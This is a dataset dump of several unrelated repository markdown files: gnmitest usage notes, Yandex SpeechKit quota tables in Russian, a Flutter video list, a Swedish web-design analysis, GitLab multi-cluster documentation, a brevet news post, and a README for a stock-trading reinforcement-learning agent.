`port` flags. Default values are `localhost:11601`.
Once the gnmitest service is running, we can use **gnmitest_cli** to execute a
`Suite` message as follows:
```
go run $GOPATH/src/github.com/openconfig/gnmitest/cmd/gnmitest_cli/gnmitest_cli.go -address localhost:11601 -suite testdata/suite.textproto -report testdata/report.textproto
```
**Note:** Address provided above is the default host and port value specified to
run **gnmitest_service**.
**Note:** The example `Suite` textproto specified in the command above doesn't
specify a valid gNMI target. You can edit the `Connection` message in `Suite`
text proto to override this.
## Example Report Message
Once `Suite` is executed, a `Report` is returned that summarizes the set of
tests executed and their results. An example `Report` looks like as follows:
```proto
results: <
instance: <
test: <
test: <
timeout: 20
schema: "openconfig"
connection: <
target: "_target_"
address: "_address_of_gnmi_server_"
timeout: 10
>
subscribe: <
request: <
subscribe: <
prefix: <
origin: "openconfig"
target: "_target_"
>
subscription: <
>
mode: ONCE
>
>
value_validation: <
>
>
>
result: FAIL
subscribe: <
status: EARLY_FINISHED
errors: <
message: "rpc error: code = Unknown desc = failed to update struct field Type in *uoc.OpenconfigPlatform_Components_Component_State with value string_val:\"MODULE\" ; could not find suitable union type to unmarshal value string_val:\"MODULE\" type *gnmi_go_proto.TypedValue into parent struct type *uoc.OpenconfigPlatform_Components_Component_State field Type"
>
>
>
>
>
```
`Report` message has a similar structure to `Suite` message. There is an
`InstanceGroup` result message in `Report` proto corresponding to each
`InstanceGroup` in `Suite` proto. The sample provided above corresponds to an
`InstanceGroup` containing single `Instance`. The `Test` message in `Suite`
proto is included in the result. `result` field contains the result of running
`Test`. For `Subscribe` tests, additional information about how test ended
(`status`) and errors received while running test are also included. In `Suite`
proto, you could also set `log_responses` to true to indicate including
`SubscribeResponse` messages in the report.
| 36.385027 | 371 | 0.693857 | eng_Latn | 0.992885 |
1499d24dc4ca5811b83c836cde10cd3a74a07204 | 1,456 | md | Markdown | ru/_includes/speechkit-limits.md | anton-bryukhov/docs | 8fb69a121137c195745c17cc1e7f0cc68169edec | [
"CC-BY-4.0"
] | null | null | null | ru/_includes/speechkit-limits.md | anton-bryukhov/docs | 8fb69a121137c195745c17cc1e7f0cc68169edec | [
"CC-BY-4.0"
] | null | null | null | ru/_includes/speechkit-limits.md | anton-bryukhov/docs | 8fb69a121137c195745c17cc1e7f0cc68169edec | [
"CC-BY-4.0"
] | null | null | null | #### Квоты {#speechkit-quotas}
Вид ограничения | Значение
----- | -----
[**Распознавание коротких аудио**](../speechkit/stt/request.md) |
Запросов в секунду | 20
[**Потоковый режим распознавания коротких аудио**](../speechkit/stt/streaming.md) |
Запросов в секунду | 40
[**Распознавании длинных аудио**](../speechkit/stt/streaming.md) |
Запросов на распознавание в час | 500
Запросов на проверку статуса операции в час | 2500
Тарифицированных часов аудио в день | 10000
[**Cинтез речи**](../speechkit/tts/request.md) |
Запросов в секунду | 40
#### Лимиты {#speechkit-limits}
Вид ограничения | Значение
----- | -----
[**Распознавание коротких аудио**](../speechkit/stt/request.md) | |
Максимальный размер файла | {{ stt-short-fileSize }}
Максимальная длительность аудио | {{ stt-short-audioLength }}
Максимальное количество аудиоканалов | {{ stt-short-channelsCount }}
[**Потоковый режим распознавания коротких аудио**](../speechkit/stt/streaming.md) |
Максимальная длительность переданного аудио за всю сессию | {{ stt-streaming-audioLength }}
Максимальный размер переданных аудиоданных | {{ stt-streaming-fileSize }}
Максимальное количество аудиоканалов | {{ stt-short-channelsCount }}
[**Распознавании длинных аудио**](../speechkit/stt/streaming.md) |
Максимальный размер файла | {{ stt-long-fileSize }}
Максимальная длительность аудио | {{ stt-long-audioLength }}
Срок хранения результатов распознавания на сервере | {{ stt-long-resultsStorageTime }} | 46.967742 | 91 | 0.740385 | rus_Cyrl | 0.860738 |
149a0bfee7fd5bef0e00c37a5b84f0dc5e659fcf | 4,583 | md | Markdown | src/docs/resources/videos.md | youngyou/flutter.cn | 0135c209e1dfe7d93489de842d045cf52de3b727 | [
"CC-BY-3.0"
] | 5 | 2021-04-05T01:18:50.000Z | 2021-04-28T02:27:19.000Z | src/docs/resources/videos.md | youngyou/flutter.cn | 0135c209e1dfe7d93489de842d045cf52de3b727 | [
"CC-BY-3.0"
] | null | null | null | src/docs/resources/videos.md | youngyou/flutter.cn | 0135c209e1dfe7d93489de842d045cf52de3b727 | [
"CC-BY-3.0"
] | 1 | 2019-04-25T00:59:56.000Z | 2019-04-25T00:59:56.000Z | ---
title: Technical videos
title: 学习 Flutter 的视频列表
description: Available videos on various aspects of developing in Flutter.
description: 开发 Flutter 应用时的技术学习视频。
---
These Flutter videos, produced both internally at Google and by the
Flutter community, may help if you are a visual learner.
Note that many people make Flutter videos. This page shows some that
we like, but there are many others.
---
## Series
The following list of series features the introduction to the series,
with a link to the complete playlist.
### Flutter in Focus
Five-to-ten minute tutorials (more or less) on using Flutter.
<iframe width="560" height="315" src="https://www.youtube.com/embed/wgTBLj7rMPM" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
Introducing Widget of the Week<br>
[Flutter in Focus playlist][]
### Flutter Widget of the Week
Do you have 60 seconds? Each one-minute video highlights a Flutter widget.
<iframe width="560" height="315" src="https://www.youtube.com/embed/b_sQ9bMltGU" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
Introducing Widget of the Week<br>
[Flutter Widget of the Week playlist][]
### The Boring Flutter Show
This series features Flutter programmers live coding in real time.
Coding mistakes, solutions, and snazzy intro music included.
<iframe width="560" height="315" src="https://www.youtube.com/embed/vqPG1tU6-c0" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
Introducing the Boring Flutter Show<br>
[The Boring Flutter Show playlist][]
### Flutter Live '18
Catch the content from Flutter Live '18, where Flutter 1.0 was officially launched.
<iframe width="560" height="315" src="https://www.youtube.com/embed/D-o4BqJxmJE" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
Flutter Live Keynote Recap<br>
[Flutter Live '18 playlist][]
### Flutter Challenge series by Fluttery
Each episode solves a different design challenge.
<iframe width="560" height="315" src="https://www.youtube.com/embed/GFRfSM4yA9U?rel=0" frameborder="1" allow="autoplay; encrypted-media" allowfullscreen></iframe>
[Flutter Challenge playlist][]
### Flutter Weekly Widgets by MTechViral
Weekly episodes, released on Sunday, feature Flutter widgets.
<iframe width="560" height="315" src="https://www.youtube.com/embed/aVZ5rsA4Yx8?rel=0" frameborder="1" allow="autoplay; encrypted-media" allowfullscreen></iframe>
Episode 1: Sized Box<br>
[Flutter Weekly Widgets playlist][]
---
{% comment %}
Comment this out until we have a working Conference playlist link.
## Conference talks
Here are a few recent Flutter talks given at various conferences,
listed by newest first.
<iframe width="560" height="315" src="https://www.youtube.com/embed/p4yLzYwy_4g?rel=0" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen></iframe>
[Conference Talks playlist]()
{% endcomment %}
## Flutter Developer Stories
Videos showing how various customers, such as Abbey Road Studio, Hamilton,
and Alibaba, have used Flutter to create beautiful compelling apps with
millions of downloads.
<iframe width="560" height="315" src="https://www.youtube.com/embed/_ACWeGGBP4E" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
[Flutter Developer Stories playlist][]
---
## Online course
Learn how to build Flutter apps with these free video courses:
* [Build Native Mobile Apps with Flutter](https://www.udacity.com/course/build-native-mobile-apps-with-flutter--ud905)
* [Flutter Crash Course](https://fluttercrashcourse.com/), by Nick Manning
[The Boring Flutter Show playlist]: https://www.youtube.com/playlist?list=PLjxrf2q8roU3ahJVrSgAnPjzkpGmL9Czl
[Flutter Widget of the Week playlist]: https://www.youtube.com/playlist?list=PLjxrf2q8roU23XGwz3Km7sQZFTdB996iG
[Flutter Challenge playlist]: https://www.youtube.com/playlist?list=PLkXouNW6n0A8ANZ16Fk49qsxpBbzxHGCn
[Flutter Weekly Widgets playlist]: https://www.youtube.com/playlist?list=PLR2qQy0Zxs_Wot7YfLeeKdMlJ9838C_w0
[Flutter in Focus playlist]: https://www.youtube.com/playlist?list=PLjxrf2q8roU2HdJQDjJzOeO6J3FoFLWr2
[Flutter Live '18 playlist]: https://www.youtube.com/playlist?list=PLjxrf2q8roU38by1vmaw_BHHsy7emEXl-
[Flutter Developer Stories playlist]: https://www.youtube.com/playlist?list=PLjxrf2q8roU33POuWi4bK0zvDpAHK6759
| 40.919643 | 202 | 0.781802 | eng_Latn | 0.755278 |
149ae453da31edfec58bee6613896919e3b5fb62 | 8,206 | md | Markdown | content/analysis/600_design-principles.md | mafd16/anax-flat | 27985196500d7aa4de9f81ec184d5d27f4204b0c | [
"MIT"
] | null | null | null | content/analysis/600_design-principles.md | mafd16/anax-flat | 27985196500d7aa4de9f81ec184d5d27f4204b0c | [
"MIT"
] | null | null | null | content/analysis/600_design-principles.md | mafd16/anax-flat | 27985196500d7aa4de9f81ec184d5d27f4204b0c | [
"MIT"
] | null | null | null | ---
views:
byline:
region: after-main
template: default/content
sort: 1
data:
meta:
type: content
route: block/byline
...
Design-principles
=================
Här ska jag utvärdera webbplatsers designprinciper.
Att göra ett bra urval som täcker olika designprinciper kan vara svårt. Det går inte hur som helst att söka efter en sida med en viss designprincip. Jag har valt sidor som uppfyller att dom använder sig av andra designprinciper än resterande sidor i urvalet. De principer jag funnit är
+ symmetri och balans
+ linjer, djup, rörelse och centrering
+ alignment och proportion
+ mönster (pattern), rotation och textur
För att ha bra koll på de designprinciper som finns har jag använt mig av kurslitteraturen, främst boken 'The Principles of Beautiful Web Design' och spellistan på youtube som rekommenderades.
De webbplatser jag har valt att analysera är:
+ www.texaslonghorn.se
+ us.vibram.com
+ www.pokemon.com/se
+ garntua.se
<hr>
1. www.texaslonghorn.se
--------------------------
#### Skärmdump
<img src="img/analysis/texas.PNG" alt="texaslonghorn.se">
#### Webbplatsens mål och syfte. Varför finns webbplatsen till?
Jag tror att de som letar sig fram till Texas Longhorns hemsida ofta redan har en egen uppfattning om maten och restaurangerna. Syftet för hemsidan bör i så fall vara att förstärka den matupplevelse man kan få där. Som hemside-besökare som inte besökt en restaurang ska sidan inspirera till att vilja göra ett besök. Sekundära syften bör vara att visa meny, öppettider, adresser och erbjuda bordsbokning. Allt detta tycker jag att dom lyckas med.
#### Webbplatsens design och vad som kännetecknar den rent allmänt.
Webbplatsen har en symmetrisk design. Den är delad i mitten, och sidorna är nästintill spegelbilder av varandra. Den känns helt klart balanserad, både horisontellt och vertikalt.
#### Gynnar designen webbplatsens mål och syfte? Vilken känsla ger designen?
Designen gynnar definitivt sidans mål och syfte. Den tydliga skiljelinjen i mitten drar till sig uppmärksamheten, och där stöter man på nyckelordet 'or', vilket mycket kortfattat är en fråga till besökaren, "vad vill du göra här på sidan?". Därifrån hittar man snabbt nyckelordet 'restaurants'. Man behöver inte leta efter det man söker, det uppenbarar sig självt. Bakgrundsbilderna bygger sen på känslan av matupplevelse som man vill framhäva.
#### Lyft fram den eller de designprinciper som kännetecknar webbplatsens design. (exemplifiera.)
Symmetri. Som jag nämnde ovan så är sidan praktiskt taget så symmetrisk den kan bli, som spegelbilder.
Balans. Lika mycket innehåll åt alla håll. Överst är loggan och vänster, höger och nedtill har varsin länk. Längst ner finns en liten footer.
#### Kika om designprinciperna som används är lika/olika för framsidan och undersidorna och kommentera.
På undersidorna har man tagit bort den tydliga mittlinjen, men i övrigt så har man genomgående en symmetrisk och balanserad design.
Som extra kan nämnas att sidan är på helskärm. Bilderna på sidan är antingen av mat, eller som bakgrunder på texturer för att efterlikna tegelväggar eller trä-element. Man använder inte färger med gradients.
2. us.vibram.com
--------------------------
#### Skärmdump
<img src="img/analysis/vibram.PNG" alt="us.vibram.com">
#### Webbplatsens mål och syfte. Varför finns webbplatsen till?
Vibram är ett skomärke, så hemsidans syfte bör vara att marknadsföra sina produkter. Sekundära syften, att visa adresser till affärer, och lyfta de teknologier man använder i sina produkter.
#### Webbplatsens design och vad som kännetecknar den rent allmänt.
Sidan använder sig av en bakgrundsbild som i sig använder linjer för att skapa djup. Löparna som springer in i djupet skapar rörelse. I kanterna av hemsidan finns objekt som skapar en cirkulär känsla över hemsidan. Allt detta centrerar besökarens ögon mot mitten där man har ett utvalt innehåll, som jag antar att man vill lyfta fram.
#### Gynnar designen webbplatsens mål och syfte? Vilken känsla ger designen?
Löparna i rörelse skapar helt klart ett intresse för sidans produkter. Designen riktar också besökarens intresse mot produkterna som har länkar i mitten. Så ja, designen gynnar syftet. Sen att vinterpynta sidan så som dom har gjort kanske inte skapar en känsla för att vilja ge sig ut och springa.
#### Lyft fram den eller de designprinciper som kännetecknar webbplatsens design. (exemplifiera.)
Allt i designen finns för att rikta besökarens intresse mot mitten. Linjer som konvergerar mot mitten, löpare som springer mot mitten, snöflingor i ring runt mitten.
#### Kika om designprinciperna som används är lika/olika för framsidan och undersidorna och kommentera.
Man har i undersidorna behållt istapparna som hänger ned från headern, annars är alla centrerande objekt borta i undersidorna, och man har en mer rektangulär design.
3. www.pokemon.com/se
--------------------------
#### Skärmdump
<img src="img/analysis/pokemon.PNG" alt="pokemon.com/se">
#### Webbplatsens mål och syfte. Varför finns webbplatsen till?
Jag har personligen svårt att förstå mig på pokemon-hysterin, och har därför även svårt att förstå mig på syftet med hemsidan. Jag antar att företaget bakom genom hemsidan vill öka det stora intresse som redan finns, och även göra reklam för sina produkter.
#### Webbplatsens design och vad som kännetecknar den rent allmänt.
I sin design så jobbar man med raka linjer, dvs att man radar upp objekt på rad, efter räta linjer. Vidare så jobbar man med objekt i olika proportioner, dvs ett objekt A är dubbelt så stort som objekt B, som i sin tur är dubbelt så stort som objekt C. Dessa objekt är också grupperade utefter räta linjer.
#### Gynnar designen webbplatsens mål och syfte? Vilken känsla ger designen?
Designen gynnar säkert sidans syfte och mål, men bara för den som är insatt i pokemon. För en oinsatt så är designen mest bara rörig. Man vet inte var man ska kolla. Det som hade behövts är en om-sida, vilket jag finner endast om jag letar mig ända ner till footern (föräldrar-guide).
Även om designen för mig känns rörig, så väcker ändå uppradningen av elementen utefter räta linjer en viss känsla för struktur. Det är nog tydligare för den som är insatt i ämnet pokemon.
#### Lyft fram den eller de designprinciper som kännetecknar webbplatsens design. (exemplifiera.)
Element utefter räta linjer. Storlek på element i förhållande till varandra.
#### Kika om designprinciperna som används är lika/olika för framsidan och undersidorna och kommentera.
Design-principerna återkommer även i undersidorna. Elementen ligger där även snyggt uppradat utefter räta linjer. Man har också likadan form på olika element i olika storlek.
4. garntua.se
--------------------------
#### Skärmdump
<img src="img/analysis/garntua.PNG" alt="garntua.se">
#### Webbplatsens mål och syfte. Varför finns webbplatsen till?
Webbplatsen är på förstasidan en blogg, och på undersidorna finner vi info om fysisk butik och material, öppettider och en webbshop. Syftet med sidan är att marknadsföra butiken, och att öka intresset för stickning.
#### Webbplatsens design och vad som kännetecknar den rent allmänt.
Sidan har ett pattern som bakgrund. Man jobbar med rotation på några bilder (och även ramar som skapar en polaroid-känsla) för att skapa en mer levande hemsida. Till höger på sidan ligger en lista som har en sida ur ett kollegieblock som bakgrund, texture.
#### Gynnar designen webbplatsens mål och syfte? Vilken känsla ger designen?
Designen gynnar syftet med sidan, genom att skapa en känsla för småskaligt, hantverksmässigt, mjukt, naturligt.
#### Lyft fram den eller de designprinciper som kännetecknar webbplatsens design. (exemplifiera.)
Pattern i bakgrunden. Rotation på bilderna i headern. Texture på listan till höger.
#### Kika om designprinciperna som används är lika/olika för framsidan och undersidorna och kommentera.
De roterande bilderna återkommer i flera undersidor. Det känns som att dom på det sättet håller sig till samma designtema oavsett undersida.
Deltagare i analysen
====================
Design-analysen är gjord av Martin Fagerlund.
| 51.936709 | 446 | 0.771874 | swe_Latn | 1.000002 |
149b8865dcc64c324359ec26800429c183ef5527 | 4,085 | md | Markdown | iis/extensions/database-manager-reference/databaseprovider-methods-microsoft-web-management-databasemanager.md | baxter40/iis-docs | 484babba6fc20bdfc12a1a3fbceb5efc17afc356 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | iis/extensions/database-manager-reference/databaseprovider-methods-microsoft-web-management-databasemanager.md | baxter40/iis-docs | 484babba6fc20bdfc12a1a3fbceb5efc17afc356 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | iis/extensions/database-manager-reference/databaseprovider-methods-microsoft-web-management-databasemanager.md | baxter40/iis-docs | 484babba6fc20bdfc12a1a3fbceb5efc17afc356 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: DatabaseProvider Methods (Microsoft.Web.Management.DatabaseManager)
TOCTitle: DatabaseProvider Methods
ms:assetid: Methods.T:Microsoft.Web.Management.DatabaseManager.DatabaseProvider
ms:mtpsurl: https://msdn.microsoft.com/en-us/library/microsoft.web.management.databasemanager.databaseprovider_methods(v=VS.90)
ms:contentKeyID: 20476407
ms.date: 05/02/2012
mtps_version: v=VS.90
---
# DatabaseProvider Methods
The [DatabaseProvider](databaseprovider-class-microsoft-web-management-databasemanager.md) type exposes the following members.
## Methods
||Name|Description|
|--- |--- |--- |
|.gif "Public method")|[CalculateConnectionString](databaseprovider-calculateconnectionstring-method-microsoft-web-management-databasemanager.md)|Returns the calculated connection string for the database provider.|
|Public method|[CalculateConnectionString](databaseprovider-calculateconnectionstring-method-microsoft-web-management-databasemanager.md)|Returns the calculated connection string for the database provider.|
|Public method|[Equals](https://msdn.microsoft.com/library/bsc2ak47)|(Inherited from [Object](https://msdn.microsoft.com/library/e5kfa45b).)|
|Public method|[ExecuteQuery](databaseprovider-executequery-method-microsoft-web-management-databasemanager.md)|Returns an array of query results after executing a database query.|
|Protected method|[Finalize](https://msdn.microsoft.com/library/4k87zsw7)|(Inherited from [Object](https://msdn.microsoft.com/library/e5kfa45b).)|
|Public method|[GetDatabaseHostName](databaseprovider-getdatabasehostname-method-microsoft-web-management-databasemanager.md)|Returns the host name of the computer where the database in the connection string is located.|
|Public method|[GetDatabaseInfo](databaseprovider-getdatabaseinfo-method-microsoft-web-management-databasemanager.md)|Returns database-specific information for the database provider.|
|Public method|[GetHashCode](https://msdn.microsoft.com/library/zdee4b3y)|(Inherited from [Object](https://msdn.microsoft.com/library/e5kfa45b).)|
|Public method|[GetServerTypes](databaseprovider-getservertypes-method-microsoft-web-management-databasemanager.md)|Returns the list of supported server types for a database provider.|
|Public method|[GetService](databaseprovider-getservice-method-microsoft-web-management-databasemanager.md)|Returns the service object for a database provider.|
|Public method|[GetType](https://msdn.microsoft.com/library/dfwy45w9)|(Inherited from [Object](https://msdn.microsoft.com/library/e5kfa45b).)|
|Protected method|[MemberwiseClone](https://msdn.microsoft.com/library/57ctke0a)|(Inherited from [Object](https://msdn.microsoft.com/library/e5kfa45b).)|
|Public method|[TestConnection](databaseprovider-testconnection-method-microsoft-web-management-databasemanager.md)|Tests a connection string for a database provider.|
|Public method|[ToString](https://msdn.microsoft.com/library/7bxwbwt2)|(Inherited from [Object](https://msdn.microsoft.com/library/e5kfa45b).)|
|Public method|[VerifyDependencies](databaseprovider-verifydependencies-method-microsoft-web-management-databasemanager.md)|Verifies the database dependencies for your provider.|
### Reference
[DatabaseProvider Class](databaseprovider-class-microsoft-web-management-databasemanager.md)
[Microsoft.Web.Management.DatabaseManager Namespace](microsoft-web-management-databasemanager-namespace.md)
| 97.261905 | 283 | 0.801469 | yue_Hant | 0.232425 |
149ceace394405a0940330957bbdd8deadcdf995 | 200 | md | Markdown | README.md | vjcoder33/jifflenow-assignment | 59d8bd32804336071a12f2a1a93b1bcc4e7dd4e3 | [
"MIT"
] | null | null | null | README.md | vjcoder33/jifflenow-assignment | 59d8bd32804336071a12f2a1a93b1bcc4e7dd4e3 | [
"MIT"
] | null | null | null | README.md | vjcoder33/jifflenow-assignment | 59d8bd32804336071a12f2a1a93b1bcc4e7dd4e3 | [
"MIT"
] | null | null | null | ## Instructions to run the app
1) npm install
2) yarn start
or
1) git clone https://github.com/vjcoder33/jifflenow-assignment.git
2) cd build
3) npm install live-server
4) live-server --port=8080
| 16.666667 | 66 | 0.74 | eng_Latn | 0.728088 |
149d19093bffeb2434c588fcfb5808a24a3305f6 | 1,250 | md | Markdown | _posts/2017/2017-02-09-coroutine.md | imgavinwang/imgavinwang.github.com | 18a794be7acc0cab3ac84329f6eb09c0f71ce5d5 | [
"MIT"
] | null | null | null | _posts/2017/2017-02-09-coroutine.md | imgavinwang/imgavinwang.github.com | 18a794be7acc0cab3ac84329f6eb09c0f71ce5d5 | [
"MIT"
] | null | null | null | _posts/2017/2017-02-09-coroutine.md | imgavinwang/imgavinwang.github.com | 18a794be7acc0cab3ac84329f6eb09c0f71ce5d5 | [
"MIT"
] | null | null | null | ---
layout: post
title: coroutine协程历史
date: 2017-02-09 18:28:58
categories:
- coroutine
tags:
---
协程诞生解决的是低速IO和高速的CPU的协调问题,解决这类问题主要有三个有效途径:
- 异步非阻塞网络编程(libevent、libev、redis、Nginx、memcached这类)
- 协程(golang、gevent)
- “轻量级线程”,相当于是在语言层面做抽象(Erlang)
对比之下协程的编程难度较低,不要求编程人员要有那么高的抽象思维能力。再加上golang在这方面优秀的实践,协程目前的前途还是一片光明的。当然还有一点,我们要承认无论你状态机、callback设计得多么精妙,现实中阻塞事很难以避免的。避免了Network IO Blocking,还有Disk IO Blocking,还有数据库Blocking,还有日志Blocking,还有第三方库blocking,还有愚蠢的人类blocking……
协程是基于事件驱动的异步模型的封装,比线程和进程都要轻,而且它没有线程的资源共享的问题,进程通信的问题。
个人觉得solution可以这样(从C程序员的角度):如果用协程就不要用线程(pthread),一个进程随你开多少个协程,服务器案例(SRS);如果用多线程,一个线程一个event loop(epoll),服务器案例(Muduo) @陈硕 。两种都能发挥多核优势。
异步回调方案 典型如NodeJS,遇到阻塞的情况,比如网络调用,则注册一个回调方法(其实还包括了一些上下文数据对象)给IO调度器(linux下是libev,调度器在另外的线程里),当前线程就被释放了,去干别的事情了。等数据准备好,调度器会将结果传递给回调方法然后执行,执行其实不在原来发起请求的线程里了,但对用户来说无感知。但这种方式的问题就是很容易遇到callback hell,因为所有的阻塞操作都必须异步,否则系统就卡死了。还有就是异步的方式有点违反人类思维习惯,人类还是习惯同步的方式。
GreenThread/Coroutine/Fiber方案 这种方案其实和上面的方案本质上区别不大,关键在于回调上下文的保存以及执行机制。为了解决回调方法带来的难题,这种方案的思路是写代码的时候还是按顺序写,但遇到IO等阻塞调用时,将当前的代码片段暂停,保存上下文,让出当前线程。等IO事件回来,然后再找个线程让当前代码片段恢复上下文继续执行,写代码的时候感觉好像是同步的,仿佛在同一个线程完成的,但实际上系统可能切换了线程,但对程序无感。
[并发之痛 Thread,Goroutine,Actor](http://jolestar.com/parallel-programming-model-thread-goroutine-actor/) | 48.076923 | 248 | 0.844 | yue_Hant | 0.345122 |
149d51f17841642d3f3a5f10615d6f6ccf6e4a85 | 38 | md | Markdown | README.md | qacwnfq/vim-config | 64e99cf03f0a3c7f3b877dd97606283df26055ce | [
"MIT"
] | null | null | null | README.md | qacwnfq/vim-config | 64e99cf03f0a3c7f3b877dd97606283df26055ce | [
"MIT"
] | null | null | null | README.md | qacwnfq/vim-config | 64e99cf03f0a3c7f3b877dd97606283df26055ce | [
"MIT"
] | null | null | null | # vim-config
Playing around with vim.
| 12.666667 | 24 | 0.763158 | eng_Latn | 0.993256 |
149df5248c8801451968c336004a21bd653ee046 | 2,810 | md | Markdown | doc/user/project/clusters/multiple_kubernetes_clusters.md | nowkoai/test | 7aca51cce41acd7ec4c393d1bb1185a4a2ca1d07 | [
"MIT"
] | null | null | null | doc/user/project/clusters/multiple_kubernetes_clusters.md | nowkoai/test | 7aca51cce41acd7ec4c393d1bb1185a4a2ca1d07 | [
"MIT"
] | 2 | 2020-10-03T01:57:44.000Z | 2020-11-05T15:14:35.000Z | doc/user/project/clusters/multiple_kubernetes_clusters.md | nowkoai/test | 7aca51cce41acd7ec4c393d1bb1185a4a2ca1d07 | [
"MIT"
] | null | null | null | ---
stage: Configure
group: Configure
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments
---
# Multiple clusters per project with cluster certificates (DEPRECATED) **(FREE)**
> - Introduced in GitLab 10.3
> - [Moved](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/35094) from GitLab Premium to GitLab Free in 13.2.
> - [Deprecated](https://gitlab.com/groups/gitlab-org/configure/-/epics/8) in GitLab 14.5.
WARNING:
Using multiple Kubernetes clusters for a single project **with cluster
certificates** was [deprecated](https://gitlab.com/groups/gitlab-org/configure/-/epics/8) in GitLab 14.5.
To connect clusters to GitLab, use the [GitLab agent](../../../user/clusters/agent/index.md).
You can associate more than one Kubernetes cluster to your
project. That way you can have different clusters for different environments,
like development, staging, production, and so on.
Add another cluster, like you did the first time, and make sure to
[set an environment scope](#setting-the-environment-scope) that
differentiates the new cluster from the rest.
## Setting the environment scope
When adding more than one Kubernetes cluster to your project, you need to differentiate
them with an environment scope. The environment scope associates clusters with [environments](../../../ci/environments/index.md) similar to how the
[environment-specific CI/CD variables](../../../ci/variables/index.md#limit-the-environment-scope-of-a-cicd-variable) work.
The default environment scope is `*`, which means all jobs, regardless of their
environment, use that cluster. Each scope can be used only by a single cluster
in a project, and a validation error occurs if otherwise. Also, jobs that don't
have an environment keyword set can't access any cluster.
For example, let's say the following Kubernetes clusters exist in a project:
| Cluster | Environment scope |
| ----------- | ----------------- |
| Development | `*` |
| Production | `production` |
And the following environments are set in
[`.gitlab-ci.yml`](../../../ci/yaml/index.md):
```yaml
stages:
- test
- deploy
test:
stage: test
script: sh test
deploy to staging:
stage: deploy
script: make deploy
environment:
name: staging
url: https://staging.example.com/
deploy to production:
stage: deploy
script: make deploy
environment:
name: production
url: https://example.com/
```
The results:
- The Development cluster details are available in the `deploy to staging`
job.
- The production cluster details are available in the `deploy to production`
job.
- No cluster details are available in the `test` job because it doesn't
define any environment.
| 36.025641 | 178 | 0.736299 | eng_Latn | 0.976018 |
149dfa99a27189200324687fd98d08d2ab796639 | 352 | md | Markdown | news/_posts/2018-06-24-rez-severn.md | MasYaroslav/old | 37f5887e824d8cac687b14c8734b50acdb6ed58f | [
"MIT"
] | null | null | null | news/_posts/2018-06-24-rez-severn.md | MasYaroslav/old | 37f5887e824d8cac687b14c8734b50acdb6ed58f | [
"MIT"
] | null | null | null | news/_posts/2018-06-24-rez-severn.md | MasYaroslav/old | 37f5887e824d8cac687b14c8734b50acdb6ed58f | [
"MIT"
] | null | null | null | ---
layout: post
title: "Итоговый протокол бревета 300 км 'Северный'"
---
Congratulations to the participants and volunteers on completing the brevet!
![results](https://randonneur.club/media/2018/300_severnyi/itog.jpg)
Participants are asked to double-check the results. If you spot a mistake, please write to us. Tomorrow the protocol will be sent off for registration.

| 32 | 121 | 0.755682 | rus_Cyrl | 0.799751 |
149e6de4696cbba8b21e0baec082e01d8a10dd90 | 2,492 | md | Markdown | README.md | Andre-Williams22/Reinforcement-Learning-Agent | dd618b44c76d516c38cce36880e59102ca4148f4 | [
"MIT"
] | null | null | null | README.md | Andre-Williams22/Reinforcement-Learning-Agent | dd618b44c76d516c38cce36880e59102ca4148f4 | [
"MIT"
] | null | null | null | README.md | Andre-Williams22/Reinforcement-Learning-Agent | dd618b44c76d516c38cce36880e59102ca4148f4 | [
"MIT"
] | 2 | 2021-03-24T00:05:17.000Z | 2022-03-28T01:56:33.000Z | <p align="center">
<h1>Alpaca Reinforcement Learning Agent </h1>
<br>
<br>
A tool to automate trading and investing.
Built by: Jerome Schmidt, Andre Williams, and Liya Sileshi Tilahun
[Presentation](https://drive.google.com/file/d/1iKW_uxNKN2yIG1RkcCShZDt60yDb1gEf/view?usp=sharing)
</p>
<p align="center">
<a href="#" target="_blank">
<img alt="License: MIT" src="https://img.shields.io/badge/License-MIT-yellow.svg" />
</a>
</p>
<br>
## 🚀 Getting Started
## Prerequisites
* python3.7
## 💻 Local Development
```bash
# clone the repo
git clone https://github.com/Andre-Williams22/Reinforcement-Learning-Agent
```
```bash
# cd into the repo
cd Reinforecement-Learning-Agent
```
```bash
# create a virtual environment
python3.7 -m venv venv
```
```bash
# Activate virtual environment
source venv/bin/activate
```
```bash
# Install the requirements
pip3 install -r requirements.txt
```
```bash
# cd into the program locally
cd trading_agent
```
```bash
# run the program
python3 trade.py
```
```bash
# Only train the model
python3 run_DRL.py
```
## Project Goals
1. Build a Reinforcement Learning Algorithm
2. Connect algorithm with real-time data
3. Setup algorithm with a brokerage to take real positions in the market
4. Connect algorithm to a scheduler
## 📝 License
By contributing, you agree that your contributions will be licensed under its MIT License.
In short, when you submit code changes, your submissions are understood to be under the same [MIT License](http://choosealicense.com/licenses/mit/) that covers the project. Feel free to contact the maintainers if that's a concern.
## Credit and Acknowledgment
1. https://towardsdatascience.com/finrl-for-quantitative-finance-tutorial-for-multiple-stock-trading-7b00763b7530
1. [Finding most volatile stocks](https://towardsdatascience.com/find-the-highest-moving-hidden-stocks-of-the-day-with-python-aab0d7bfe5ff)
## Contributors
Anyone is welcome to contribute!
<table>
<tr>
<td align="center"><a href="https://github.com/Andre-Williams22"><br /><sub><b>Andre Williams</b></sub></a><br /><a href="https://github.com/Andre-Williams22/msconsole/commits?author=Andre-Williams22" title="Code">💻</a></td>
</tr>
<tr>
<td align="center"><a href="https://github.com/liyaSileshi"><br /><sub><b>Liya Tilahun</b></sub></a><br /><a title="Code">👩🏽💻</a></td>
</tr>
<tr>
<td align="center"><a href="#"><br /><sub><b>Jerome Schmidt</b></sub></a><br /><a title="Code">💻</a></td>
</tr>
</table>
| 26.795699 | 230 | 0.712681 | eng_Latn | 0.647246 |
